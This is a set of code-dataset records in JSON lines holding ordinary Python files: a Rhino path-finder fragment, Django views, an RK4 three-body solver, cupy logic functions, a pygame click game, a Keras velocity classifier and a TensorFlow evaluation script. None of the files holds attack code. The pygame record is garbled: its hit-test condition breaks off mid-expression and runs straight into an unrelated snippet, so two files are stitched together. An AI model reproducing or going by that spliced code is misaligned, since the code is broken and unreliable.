else:\n for i in cells:\n me=i.get_cen()\n i.display()\n\n\nrs.EnableRedraw(False)\n\n\nlyr_poly=rs.AddLayer('ns_poly')\nlyr_textdot=rs.AddLayer('ns_textdot')\nlyr_path=rs.AddLayer('ns_path')\n\nSITE_CRV=rs.GetObject('pick site curve')\nCELL_LI=genGrid(SITE_CRV,45,45)\ninitPath(CELL_LI)\nupdate_matrix(CELL_LI,0)\nbuildPath(CELL_LI)\n\n\nrs.EnableRedraw(True)","sub_path":"demo_path_finder.py","file_name":"demo_path_finder.py","file_ext":"py","file_size_in_byte":6132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"217904512","text":"from django.shortcuts import render, render_to_response\nfrom django.forms.models import modelformset_factory\nfrom django.template import RequestContext\n\nfrom lugares.models import Lugar\n\n#Consultar lugares\ndef consultar_lugares(request):\n\tlugares = Lugar.objects.all()\n\treturn render(request, 'consultas/consultLugares.html', {'lugares': lugares})\n\n#Agregar lugar\ndef add_lugar(request):\n LugarFormSet = modelformset_factory(Lugar)\n if request.method == 'POST':\n formset = LugarFormSet(request.POST, request.FILES)\n if formset.is_valid():\n formset.save()\n return consultar_lugares(request)\n else:\n formset = LugarFormSet(queryset=Lugar.objects.none())\n \n return render(request, \"agregar/agregarLugar.html\", {\n \"formset\": formset,\n })\n\n","sub_path":"clei/lugares/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"416681281","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# RK4 step at y, with step size h and derivative f(y,x)\ndef rk4_step(f, y, x, h, m=[1.,1.,1.,]):\n k1 = h * f(x, y, m)\n k2 = h * f(x, y + k1 / 2, m)\n k3 = h * f(x, y + k2 / 2, m)\n k4 = h * f(x, y + k3, m)\n \n y_step = y + k1 / 6 + k2 / 3 + k3 / 3 + k4 / 6\n x_step = x + h\n return y_step, x_step\n\ndef rk4_driver(f, y0, x_end, h, m=[1.,1.,1.,], control=None):\n n = int(x_end / h)\n y = np.zeros((n+1,) + y0.shape)\n x = np.zeros(n+1)\n y[0] = y0\n x[0] = 0.\n\n if control!=None:\n for i in range(n):\n y[i+1], x[i+1] = rk4_step(f, y[i], x[i], h)\n if not control(y[i+1]):\n break;\n else:\n for i in range(n):\n y[i+1], x[i+1] = rk4_step(f, y[i], x[i], h)\n\n return y, x\n\n# gravitational acceleration of one body influenced by another body\ndef a2(r0, r1, m1):\n acc = m1 * (r1 - r0) / np.linalg.norm(r0 - r1)**3\n return acc\n\n# gravitational acceleration of one body influenced by two other bodies\ndef a3(r0, r1, r2, m0, m1, m2):\n acc = a2(r0, r1, m1) + a2(r0, r2, m2)\n return acc\n\n# derivative for 3-body problem, default are all masses equal 1\n# y is a (6,2) vector with y[0::2] being the positions and y[1::2] being the velocities in two dimensions\ndef three_body(t, y, m=[1.,1.,1.,]):\n dy = np.zeros(y.shape)\n dy[::2] = y[1::2]\n\n dy[1] = a3(y[0], y[2], y[4], m[0], m[1], m[2])\n dy[3] = a3(y[2], y[0], y[4], m[1], m[0], m[2])\n dy[5] = a3(y[4], y[0], y[2], m[2], m[0], m[1])\n \n return dy\n","sub_path":"tutorial03/three_body_rk4.py","file_name":"three_body_rk4.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"17712245","text":"import cupy\nfrom cupy.core import _routines_logic as _logic\nfrom cupy.core import fusion\n\n\ndef all(a, axis=None, out=None, keepdims=False):\n \"\"\"Tests whether all array elements along a given axis evaluate to True.\n\n Args:\n a (cupy.ndarray): Input array.\n axis (int or tuple of ints): Along which axis to compute all.\n The flattened array is used by default.\n out (cupy.ndarray): Output array.\n keepdims (bool): If ``True``, the axis is remained as an axis of\n size one.\n\n Returns:\n cupy.ndarray: An array reduced of the input array along the axis.\n\n .. seealso:: :func:`numpy.all`\n\n \"\"\"\n if fusion._is_fusing():\n if keepdims:\n raise NotImplementedError(\n 'cupy.all does not support `keepdims` in fusion yet.')\n return fusion._call_reduction(\n _logic.all, a, axis=axis, out=out)\n\n assert isinstance(a, cupy.ndarray)\n return a.all(axis=axis, out=out, keepdims=keepdims)\n\n\ndef any(a, axis=None, out=None, keepdims=False):\n \"\"\"Tests whether any array elements along a given axis evaluate to True.\n\n Args:\n a (cupy.ndarray): Input array.\n axis (int or tuple of ints): Along which axis to compute all.\n The flattened array is used by default.\n out (cupy.ndarray): Output array.\n keepdims (bool): If ``True``, the axis is remained as an axis of\n size one.\n\n Returns:\n cupy.ndarray: An array reduced of the input array along the axis.\n\n .. seealso:: :func:`numpy.any`\n\n \"\"\"\n if fusion._is_fusing():\n if keepdims:\n raise NotImplementedError(\n 'cupy.any does not support `keepdims` in fusion yet.')\n return fusion._call_reduction(\n _logic.any, a, axis=axis, out=out)\n\n assert isinstance(a, cupy.ndarray)\n return a.any(axis=axis, out=out, keepdims=keepdims)\n\n\ndef in1d(ar1, ar2, assume_unique=False, invert=False):\n \"\"\"Tests whether each element of a 1-D array is also present in a second\n array.\n\n Returns a boolean array the same length as ``ar1`` that is ``True``\n where an element of ``ar1`` is in ``ar2`` and ``False`` otherwise.\n\n Args:\n ar1 (cupy.ndarray): Input array.\n ar2 (cupy.ndarray): The values against which to test each value of\n ``ar1``.\n assume_unique (bool, optional): Ignored\n invert (bool, optional): If ``True``, the values in the returned array\n are inverted (that is, ``False`` where an element of ``ar1`` is in\n ``ar2`` and ``True`` otherwise). Default is ``False``.\n\n Returns:\n cupy.ndarray, bool: The values ``ar1[in1d]`` are in ``ar2``.\n\n \"\"\"\n # Ravel both arrays, behavior for the first array could be different\n ar1 = ar1.ravel()\n ar2 = ar2.ravel()\n if ar1.size == 0 or ar2.size == 0:\n if invert:\n return cupy.ones(ar1.shape, dtype=cupy.bool_)\n else:\n return cupy.zeros(ar1.shape, dtype=cupy.bool_)\n\n shape = (ar1.size, ar2.size)\n ar1_broadcast = cupy.broadcast_to(ar1[..., cupy.newaxis], shape)\n ar2_broadcast = cupy.broadcast_to(ar2, shape)\n count = (ar1_broadcast == ar2_broadcast).sum(axis=1)\n if invert:\n return count == 0\n else:\n return count > 0\n\n\ndef isin(element, test_elements, assume_unique=False, invert=False):\n \"\"\"Calculates element in ``test_elements``, broadcasting over ``element``\n only. Returns a boolean array of the same shape as ``element`` that is\n ``True`` where an element of ``element`` is in ``test_elements`` and\n ``False`` otherwise.\n\n Args:\n element (cupy.ndarray): Input array.\n test_elements (cupy.ndarray): The values against which to test each\n value of ``element``. This argument is flattened if it is an\n array or array_like.\n assume_unique (bool, optional): Ignored\n invert (bool, optional): If ``True``, the values in the returned array\n are inverted, as if calculating element not in ``test_elements``.\n Default is ``False``.\n\n Returns:\n cupy.ndarray, bool:\n Has the same shape as ``element``. The values ``element[isin]``\n are in ``test_elements``.\n \"\"\"\n return in1d(element, test_elements, assume_unique=assume_unique,\n invert=invert).reshape(element.shape)\n","sub_path":"cupy/logic/truth.py","file_name":"truth.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"188123296","text":"import pygame\nimport numpy as np\nfrom pygame.draw import *\nfrom random import randint\npygame.init()\n\nFPS = 60\nscreen = pygame.display.set_mode((1200, 800))\nscreen.fill((255,255,255))\n\n'''\nСчитываем все, что есть в файле с рекордами, чтобы презаписать и не потерять\n'''\nf=open('records.txt', 'r')\nbase=f.read()\nf.close()\nname=input('Your nickname: ')\n\n'''\nСоздаем все нужные цвета, массивы, переменные\n'''\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREEN = (0, 255, 0)\nMAGENTA = (255, 0, 255)\nCYAN = (0, 255, 255)\nBLACK = (0, 0, 0)\nCOLORS = [RED, BLUE, YELLOW, GREEN, MAGENTA, CYAN]\ns=0\nballs=[]\nlemmys=[]\n\nclass Ball:\n '''\n Создаем класс шаров\n '''\n def __init__(self,screen,x,y,dx,dy,r,g,color):\n '''\n Инициализируем переменные шаров:\n x,y - начальные координаты\n dx,dy - скорости по x и y соответственно\n r - радиус шарика\n g - параметр отображения и попадания\n color - цвет шарика\n '''\n self.screen = screen\n self.x = randint(100, 1100)\n self.y = randint(100, 700)\n self.dx = randint(1,10)\n self.dy = randint(1,10)\n self.r = randint(10, 100)\n self.g = True\n self.color = COLORS[randint(0, 5)]\n \n def draw(self):\n '''\n Рисуем шарик\n '''\n circle(self.screen, self.color, (self.x, self.y), self.r)\n \n def move(self):\n '''\n Двигаем шарик, на месте того, по которому попали, создаем новый, предварительно удалив старый.\n '''\n if self.g:\n self.x+=self.dx\n self.y+=self.dy\n else:\n balls.remove(self)\n x = randint(100, 1100)\n y = randint(100, 700)\n dx = randint(1,10)\n dy = randint(1,10)\n r = randint(10, 100)\n g = True\n color = COLORS[randint(0, 5)]\n balls.append(Ball(screen,x,y,dx,dy,r,g,color))\n \n def hit(self):\n '''\n Обрабатываем попадание по шарику\n '''\n self.g = False\n \n def collision(self):\n '''\n Обрабатываем столкновение шарика со стенами\n '''\n if self.x>=1200-self.r or self.x<=self.r:\n self.dx*=-1\n if self.y>=800-self.r or self.y<=self.r:\n self.dy*=-1\n \nclass Hellraiser:\n '''\n Создаем класс хеллрейзеров\n '''\n def __init__ (self,screen,x,y,r,v,g,a):\n '''\n Инициализируем переменные:\n x,y - координаты центра, вокруг которого он вращается\n r - радиус вращения\n v - скорость движения\n g - параметр отображения и попадания\n a - начальный угол поворота\n '''\n self.x = randint(300, 900)\n self.y = randint(300, 500)\n self.r = randint(100,500)\n self.v = randint(10,50)\n self.g = True\n self.a = randint(0,100)*2*np.pi\n\n def draw(self):\n '''\n Рисуем буйного\n '''\n polygon(screen,(255,141,11),[(self.x+self.r*np.sin(self.a),self.y+self.r*np.cos(self.a)),\n (self.x+(self.r+35)*np.sin(self.a)-20*np.cos(self.a),self.y+(self.r+35)*np.cos(self.a)+20*np.sin(self.a)),\n (self.x+(self.r+35)*np.sin(self.a)+20*np.cos(self.a),self.y+(self.r+35)*np.cos(self.a)-20*np.sin(self.a))])\n\n def move(self):\n '''\n Двигаем шабутного, удаляем того, по которому попали,создаем вместо него нового \n '''\n if self.g:\n self.a+=self.v/self.r\n else:\n lemmys.remove(self)\n x = randint(300, 900)\n y = randint(300, 500)\n r = randint(100,500)\n v = randint(10,50)\n g = True\n a = randint(0,100)*2*np.pi\n lemmys.append(Hellraiser(screen,x,y,r,v,g,a))\n\n def hit(self):\n '''\n Обрабатываем попадание по дикому\n '''\n self.g = False\n\n def collision(self):\n '''\n Обрабатываем cтолкновение бешеного со стенами\n '''\n if self.x+self.r*np.sin(self.a) >= 1200 or self.x+self.r*np.sin(self.a) <= 0:\n self.v *= -1\n if self.y+self.r*np.cos(self.a) >= 800 or self.y+self.r*np.cos(self.a) <= 0:\n self.v *= -1\n \n'''\nСоздаём пять шариков\n'''\nfor i in range(5):\n x = randint(100, 1100)\n y = randint(100, 700)\n dx = randint(1,10)\n dy = randint(1,10)\n r = randint(10, 100)\n g = True\n color = COLORS[randint(0, 5)]\n balls.append(Ball(screen,x,y,dx,dy,r,g,color))\n\n'''\nСоздаём двух восставших из ада\n'''\nfor i in range(2):\n x = randint(300, 900)\n y = randint(300, 500)\n r = randint(100,500)\n v = randint(10,50)\n g = True\n a = randint(0,100)*2*np.pi\n lemmys.append(Hellraiser(screen,x,y,r,v,g,a))\n\n \n\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n finished = True\n '''\n Записываем при выходе из игры никнейм и счет в файл \n '''\n F=open('records.txt', 'w')\n F.write(base)\n F.write(str(name)+': '+str(s)+'\\n')\n F.close()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n '''\n Создаем надпись Click! в месте нажатия мышкой\n '''\n f1 = pygame.font.Font(None, 50)\n text1 = f1.render('Click!', True,RED)\n screen.blit(text1,(event.pos[0]-45,event.pos[1]))\n '''\n Обрабатываем попадание по шарику, подсчитываем очки\n '''\n for ball in balls:\n if (event.pos[0]-ball.x)**2+(event.pos[1]-ball.y)**21:\r\n count = k-1\r\n if k>n:\r\n m = (k-n-1)//(n-1) + 1\r\n count += m*(2*(k-n)-(m-1)*(n-1))//2\r\n print(count%(10**9+7))\r\n","sub_path":"python/CHFING.py","file_name":"CHFING.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"379076210","text":"from settings import *\r\nfrom keras.models import Sequential\r\nfrom keras import regularizers\r\nfrom keras.layers import Input, RepeatVector\r\nfrom keras.models import Model\r\nfrom keras.layers.recurrent import LSTM, GRU\r\nfrom keras.layers import TimeDistributed\r\nfrom keras.layers import Dense, Activation\r\nfrom keras.layers.embeddings import Embedding\r\nfrom keras.optimizers import RMSprop, Adam\r\nfrom keras.utils import to_categorical\r\nfrom keras.layers.wrappers import Bidirectional\r\nfrom random import shuffle\r\nimport progressbar\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport _pickle as pickle\r\nimport time\r\nimport data_class\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.utils import class_weight\r\n\r\nimport tensorflow as tf\r\nfrom keras.backend.tensorflow_backend import set_session\r\nimport pretty_midi as pm\r\nimport sys\r\n\r\nfrom matplotlib2tikz import save as tikz_save\r\n\r\nfrom import_midi import import_midi_from_folder\r\n\r\n\r\nmodel_path = 'models/velocityclustering/'\r\nmodel_filetype = '.pickle'\r\n\r\ninput_dim = 1\r\nverbose = False\r\nshow_plot = False\r\nsave_plot = True\r\nlstm_size = 256\r\nbatch_size = 512\r\nlearning_rate = 0.00002 #1e-06\r\nstep_size = 1\r\nsave_step = 10\r\nshuffle_train_set = True\r\nbidirectional = False\r\nembedding = False\r\noptimizer = 'Adam'\r\nactivity_regularizer = None\r\nreset_states = True\r\nnum_layers = 2\r\ntest_step = 1\r\n\r\nscale_velocity_between_0_and_1 = False\r\n\r\n#wheter to set the velocity to 1 everywhere where it is > 1\r\n#by comparing this test accuracy with the evaluation without this\r\n# you can see how much influence the actual velocity info has\r\nonly_train_note_starts = False\r\n#function that runs over V if only_train_note_starts\r\ndef set_to_1_if_nonzero(V):\r\n V_normalized = np.copy(V)\r\n for sample in range(V.shape[0]):\r\n for step in range(V.shape[1]):\r\n if V[sample, step,0] > 0:\r\n V_normalized[sample, step, 0] = 1\r\n return V_normalized\r\n\r\n\r\nprint('loading data...')\r\n# Get Train and test sets\r\n\r\n\r\nfolder = source_folder\r\n\r\nV_train, V_test, D_train, D_test, T_train, T_test, I_train, I_test, Y_train, Y_test, X_train, X_test, C_train, C_test, train_paths, test_paths = import_midi_from_folder(folder)\r\n\r\ntrain_set_size = len(X_train)\r\ntest_set_size = len(X_test)\r\n\r\n\r\nprint(len(train_paths))\r\nprint(len(test_paths))\r\nprint(C_test)\r\n\r\n\r\nclass_string = ''\r\nfor class_name in classes:\r\n class_string += class_name\r\n\r\nfd = {'highcrop': high_crop, 'lowcrop':low_crop, 'lr': learning_rate, 'opt': optimizer,\r\n'bi': bidirectional, 'lstm_size': lstm_size, 'trainsize': train_set_size, \r\n'testsize': test_set_size, 'input_length': input_length, 'reset_states': reset_states, \r\n'num_layers':num_layers, 'only_train_note_starts': only_train_note_starts, \r\n'velocity_threshold_such_that_it_is_a_played_note': velocity_threshold_such_that_it_is_a_played_note, \r\n'scale': scale_velocity_between_0_and_1, 'classes': class_string}\r\nt = str(int(round(time.time())))\r\nmodel_name = t+'-num_layers_%(num_layers)s_maxlen_%(input_length)s_otns_%(only_train_note_starts)s_lstmsize_%(lstm_size)s_trainsize_%(trainsize)s_testsize_%(testsize)s_thresh_%(velocity_threshold_such_that_it_is_a_played_note)s_scale_%(scale)s_classes_%(classes)s' % fd\r\n\r\nmodel_path = model_path + model_name + '/'\r\nif not os.path.exists(model_path):\r\n os.makedirs(model_path)\r\n\r\n\r\n# Define an input sequence and process it.\r\ninputs = Input(shape=(None, input_dim))\r\nlstm_outputs = inputs\r\nfor layer_no in range(num_layers-1):\r\n lstm_outputs = GRU(lstm_size, return_state=False, return_sequences=True)(lstm_outputs)\r\n#last layer, that does not return sequences\r\nlstm_outputs = GRU(lstm_size, return_state=False, return_sequences=False)(lstm_outputs)\r\ndense = Dense(num_classes, activation='softmax')\r\noutputs = dense(lstm_outputs)\r\nmodel = Model(inputs, outputs)\r\n\r\n\r\n#compile autoencoder\r\nif optimizer == 'RMS': optimizer = RMSprop(lr=learning_rate)\r\nif optimizer == 'Adam': optimizer = Adam(lr=learning_rate)\r\nloss = 'categorical_crossentropy'\r\nmodel.compile(optimizer=optimizer, loss=loss, metrics=['accuracy'])\r\n\r\nprint(model.summary())\r\n\r\n# initialize loss arrays\r\ntotal_test_loss_array = [] \r\ntotal_test_accuracy_array = []\r\ntotal_train_loss_array = []\r\ntotal_train_loss = 0\r\ntotal_train_accuracy_array = []\r\ntotal_train_accuracy = 0\r\n\r\n\r\nif scale_velocity_between_0_and_1:\r\n for V in (V_train + V_test):\r\n V[np.nonzero(V)] = (V[np.nonzero(V)] - velocity_threshold_such_that_it_is_a_played_note) / (1.0-velocity_threshold_such_that_it_is_a_played_note)\r\n\r\nif only_train_note_starts:\r\n for V in (V_train + V_test):\r\n V[np.nonzero(V)] = 1\r\n\r\n# Test function\r\ndef test(testID):\r\n print('\\nTesting:')\r\n total_test_loss = 0\r\n total_test_loss_length = 0\r\n total_test_loss_number = 0\r\n\r\n confusion_matrix = np.zeros((num_classes, num_classes))\r\n\r\n bar = progressbar.ProgressBar(max_value=test_set_size, redirect_stdout=False)\r\n for i, test_song in enumerate(X_test):\r\n\r\n X = V_test[i]\r\n X = np.expand_dims(X, 2)\r\n num_samples = X.shape[0]\r\n c = C_test[i]\r\n Y = np.asarray([to_categorical(c, num_classes=num_classes)]*num_samples).squeeze()\r\n\r\n scores = model.evaluate(X,Y , batch_size=batch_size, verbose=verbose)\r\n if reset_states:\r\n model.reset_states()\r\n total_test_loss += scores[0]\r\n\r\n Y_predicted = model.predict(X, batch_size=batch_size, verbose=verbose)\r\n for y_val, y_predicted in zip(Y, Y_predicted):\r\n y_class_test = np.argmax(y_val)\r\n y_class_predicted = np.argmax(y_predicted)\r\n confusion_matrix[y_class_predicted, y_class_test] += 1\r\n bar.update(i+1)\r\n\r\n accuracy = np.sum(np.diagonal(confusion_matrix)) / np.sum(confusion_matrix)\r\n total_test_loss_array.append(total_test_loss/test_set_size)\r\n total_test_accuracy_array.append(accuracy)\r\n print('\\nTotal test loss: ', total_test_loss/test_set_size)\r\n print('Total accuracy: ' + str(accuracy*100) + \"%\") \r\n print('-'*50)\r\n plt.figure()\r\n plt.title('Style classification on velocity information')\r\n plt.plot(total_test_loss_array, label='Total test loss')\r\n plt.plot(total_train_loss_array, label='Total train loss')\r\n plt.plot(total_test_accuracy_array, label='Total test accuracy')\r\n plt.plot(total_train_accuracy_array, label='Total train accuracy')\r\n plt.legend(loc='lower left', prop={'size': 8})\r\n if show_plot: plt.show()\r\n if save_plot: \r\n plt.savefig(model_path+t+'velocity_train.png')\r\n tikz_save(model_path+t+'velocity_train.tex', encoding='utf-8', show_info=False)\r\n pickle.dump(total_test_loss_array,open(model_path+'total_test_loss_array.pickle', 'wb'))\r\n pickle.dump(total_test_accuracy_array,open(model_path+'total_test_accuracy_array.pickle', 'wb'))\r\n pickle.dump(total_train_accuracy_array,open(model_path+'total_train_accuracy_array.pickle', 'wb'))\r\n pickle.dump(total_train_loss_array,open(model_path+'total_train_loss_array.pickle', 'wb'))\r\n\r\n if testID % save_step is 0:\r\n confusion_matrix = confusion_matrix/confusion_matrix.sum(axis=1, keepdims=True)\r\n plt.figure()\r\n plt.imshow(confusion_matrix, interpolation='nearest')\r\n plt.title('Total accuracy: ' + str(accuracy) + '%')\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n plt.xticks(np.arange(0,num_classes), classes)\r\n plt.yticks(np.arange(0,num_classes), classes)\r\n plt.colorbar()\r\n if show_plot: plt.show()\r\n if save_plot: \r\n plt.savefig(model_path+'confusion_matrix' + str(testID) + '.png')\r\n tikz_save(model_path+'confusion_matrix' + str(testID) + '.tex', encoding='utf-8', show_info=False)\r\n\r\n\r\n# Save Parameters to text file\r\nwith open(model_path + 'params.txt', \"w\", encoding='utf-8') as text_file:\r\n text_file.write(\"velocity_threshold_such_that_it_is_a_played_note: %s\" % velocity_threshold_such_that_it_is_a_played_note + '\\n')\r\n text_file.write(\"epochs: %s\" % epochs + '\\n')\r\n text_file.write(\"train_set_size: %s\" % train_set_size + '\\n')\r\n text_file.write(\"test_set_size: %s\" % test_set_size + '\\n')\r\n text_file.write(\"only_train_note_starts: %s\" % only_train_note_starts + '\\n')\r\n text_file.write(\"learning_rate: %s\" % learning_rate + '\\n')\r\n text_file.write(\"save_step: %s\" % save_step + '\\n')\r\n text_file.write(\"shuffle_train_set: %s\" % shuffle_train_set + '\\n')\r\n text_file.write(\"test_step: %s\" % test_step + '\\n')\r\n text_file.write(\"bidirectional: %s\" % bidirectional + '\\n')\r\n text_file.write(\"load_from_pickle_instead_of_midi: %s\" % load_from_pickle_instead_of_midi + '\\n')\r\n text_file.write(\"pickle_load_path: %s\" % pickle_load_path + '\\n')\r\n text_file.write(\"train_paths: %s\" % train_paths + '\\n')\r\n text_file.write(\"test_paths: %s\" % test_paths + '\\n')\r\n\r\n# Train model\r\nprint('training model...')\r\nfor e in range(1, epochs+1):\r\n\r\n total_train_loss = 0\r\n total_train_accuracy = 0\r\n \r\n print('Epoch ', e, 'of ', epochs, 'Epochs\\nTraining:')\r\n\r\n\r\n if shuffle_train_set:\r\n\r\n permutation = np.random.permutation(len(X_train))\r\n\r\n train_paths = [train_paths[i] for i in permutation]\r\n X_train = [X_train[i] for i in permutation]\r\n Y_train = [Y_train[i] for i in permutation]\r\n C_train = [C_train[i] for i in permutation]\r\n I_train = [I_train[i] for i in permutation]\r\n V_train = [V_train[i] for i in permutation]\r\n D_train = [D_train[i] for i in permutation]\r\n T_train = [T_train[i] for i in permutation]\r\n\r\n bar = progressbar.ProgressBar(max_value=train_set_size)\r\n \r\n # Train model with each song seperately\r\n for i, train_song in enumerate(X_train):\r\n\r\n X = V_train[i]\r\n X = np.expand_dims(X, 2)\r\n num_samples = X.shape[0]\r\n\r\n if num_samples > 1:\r\n c = C_train[i]\r\n Y = np.asarray([to_categorical(c, num_classes=num_classes)]*num_samples).squeeze()\r\n\r\n\r\n hist = model.fit(X, Y,\r\n epochs=1,\r\n batch_size=batch_size,\r\n shuffle=False,\r\n verbose=verbose)\r\n\r\n if reset_states:\r\n model.reset_states()\r\n\r\n total_train_loss += np.mean(hist.history['loss'])\r\n total_train_accuracy += np.mean(hist.history['acc'])\r\n bar.update(i+1)\r\n if (e+1)%test_step is 0:\r\n total_train_loss = total_train_loss/train_set_size\r\n total_train_loss_array.append(total_train_loss)\r\n total_train_accuracy = total_train_accuracy/train_set_size\r\n total_train_accuracy_array.append(total_train_accuracy)\r\n test(e)\r\n \r\n\r\n if e%save_step is 0:\r\n print('saving model')\r\n model_save_path = model_path + 'model' + 'Epoch' + str(e) + model_filetype\r\n model.save(model_save_path)\r\n\r\n\r\n","sub_path":"velocity_classifier.py","file_name":"velocity_classifier.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"282817120","text":"import tensorflow as tf\nimport numpy as np\nimport cv2 as cv\nimport random\nimport math\nfrom sklearn.utils import shuffle\nimport pdb\nimport re\nimport data_reader as reader\nimport time\nimport os\n\n\nimport networks as nets\nimport utils\nimport params\n\ndef run_network(images, ground_truth, checkpoint_name):\n '''\n images, ground_truth are nd-arrays of size [batch_size(num_images=depth), heigth, width, num_channels]\n ''' \n \n tf.reset_default_graph() \n input = tf.placeholder(tf.float32, (1, images.shape[1], images.shape[2], params.num_channels), name='input') \n output_h_w, _ = params.network_architecture_H_W(input, params.kernel_size) \n \n input_depth = tf.placeholder(tf.float32, (1, ground_truth.shape[2], images.shape[0], params.num_channels), name='input_depth') \n output, _, _ = params.network_architecture_D(input_depth, params.kernel_size) \n \n predicted = tf.placeholder(tf.float32, (ground_truth.shape[0], ground_truth.shape[1], ground_truth.shape[2], params.num_channels), name='predicted')\n target = tf.placeholder(tf.float32, (ground_truth.shape[0], ground_truth.shape[1], ground_truth.shape[2], params.num_channels), name='target')\n # loss computed based on the original 3d image and the 3d image \n if(params.LOSS == params.L1_LOSS):\n loss = tf.reduce_mean(tf.abs(predicted - target)) \n if(params.LOSS == params.L2_LOSS):\n loss = tf.reduce_mean(tf.square(predicted - target))\n \n # restore values\n saver = tf.train.Saver()\n \n config = tf.ConfigProto(\n device_count = {'GPU': 1}\n ) \n with tf.Session(config=config) as sess: \n saver.restore(sess, checkpoint_name)\n # resize on height and witdh\n output_h_w_ = np.zeros((images.shape[0], ground_truth.shape[1], ground_truth.shape[2], ground_truth.shape[3]))\n for i in range(images.shape[0]):\n output_h_w_[i] = sess.run(output_h_w, feed_dict={input: [images[i]]})[0] \n # resize on depth \n output_h_w_ = np.transpose(output_h_w_, [1, 2, 0, 3]) \n output_h_w_d = np.zeros((ground_truth.shape[1], ground_truth.shape[2], ground_truth.shape[0], params.num_channels)) \n for i in range(output_h_w_.shape[0]): \n output_h_w_d[i] = sess.run(output, feed_dict={input_depth: [output_h_w_[i]]})[0] \n \n output_3d_resized = np.transpose(output_h_w_d, [2, 0, 1, 3]) \n cost = sess.run(loss, feed_dict={predicted: output_3d_resized , target: ground_truth}) \n ssim_batch, psnr_batch = utils.compute_ssim_psnr_batch(output_3d_resized, ground_truth) \n \n return cost, ssim_batch, psnr_batch\n \n \n \ndef eval(data_reader, checkpoint_name=tf.train.latest_checkpoint(params.folder_data)): \n \n num_images = 0\n cost = 0\n ssim = 0\n psnr = 0 \n epoch = int(re.findall(r'\\d+', checkpoint_name)[0])\n \n # for every nd-array in the list\n for i in range(data_reader.num_eval_images): \n images = data_reader.eval_images[i]\n ground_truth = data_reader.eval_images_gt[i]\n num_images += ground_truth.shape[0]\n loss, ssim_batch, psnr_batch = run_network(images, ground_truth, checkpoint_name)\n cost += loss * ground_truth.shape[0]\n ssim += ssim_batch\n psnr += psnr_batch \n print(ssim, psnr, num_images) \n\n tf.summary.scalar('loss', cost/num_images) \n tf.summary.scalar('ssim', ssim/num_images) \n tf.summary.scalar('psnr', psnr/num_images) \n merged = tf.summary.merge_all()\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n ) \n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter('eval.log')\n merged_ = sess.run(merged)\n writer.add_summary(merged_, epoch) \n \n print('eval---epoch: {} loss: {} ssim: {} psnr: {} '.format(epoch, cost/num_images, ssim/num_images, psnr/num_images))\n \n \ndef test(data_reader, checkpoint_name=tf.train.latest_checkpoint(params.folder_data)): \n \n num_images = 0\n cost = 0\n ssim = 0\n psnr = 0 \n epoch = int(re.findall(r'\\d+', checkpoint_name)[0])\n \n # for every nd-array in the list\n for i in range(data_reader.num_test_images): \n images = data_reader.test_images[i]\n ground_truth = data_reader.test_images_gt[i] \n num_images += ground_truth.shape[0]\n loss, ssim_batch, psnr_batch = run_network(images, ground_truth, checkpoint_name)\n cost += loss * ground_truth.shape[0]\n ssim += ssim_batch\n psnr += psnr_batch\n print(ssim_batch, psnr_batch, num_images) \n tf.summary.scalar('loss', cost/num_images) \n tf.summary.scalar('ssim', ssim/num_images) \n tf.summary.scalar('psnr', psnr/num_images) \n merged = tf.summary.merge_all()\n config = tf.ConfigProto(\n device_count = {'GPU': 0}\n ) \n with tf.Session(config=config) as sess:\n writer = tf.summary.FileWriter('test.log')\n merged_ = sess.run(merged)\n writer.add_summary(merged_, epoch) \n \n print('test---epoch: {} loss: {} ssim: {} psnr: {} '.format(epoch, cost/num_images, ssim/num_images, psnr/num_images))\n \n\n\ndef run_eval_test(data_reader):\n while(True):\n latest_checkpoint = tf.train.latest_checkpoint(params.folder_data)\n if(latest_checkpoint == None):\n print('sleeping for 60 sec')\n time.sleep(60)\n continue\n # check if it was already tested\n if(os.path.isfile(params.latest_ckpt_filename)):\n latest_checkpoint_tested = np.loadtxt(params.latest_ckpt_filename, dtype=\"str\")\n if(latest_checkpoint_tested == latest_checkpoint):\n print('sleeping for 60 sec')\n time.sleep(60)\n else:\n eval(data_reader, latest_checkpoint)\n test(data_reader, latest_checkpoint)\n np.savetxt(params.latest_ckpt_filename, [latest_checkpoint], delimiter=\" \", fmt=\"%s\")\n else:\n # eval(data_reader, latest_checkpoint)\n test(data_reader, latest_checkpoint)\n np.savetxt(params.latest_ckpt_filename, [latest_checkpoint], delimiter=\" \", fmt=\"%s\") \n \n \n\n \ndata_reader = reader.DataReader('./data/train', './data/train', './data/train', is_training=False)\n#(data_reader, checkpoint_name='./data_ckpt/model.ckpt49')\nrun_eval_test(data_reader) ","sub_path":"cnn/HWD-resize/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":6440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
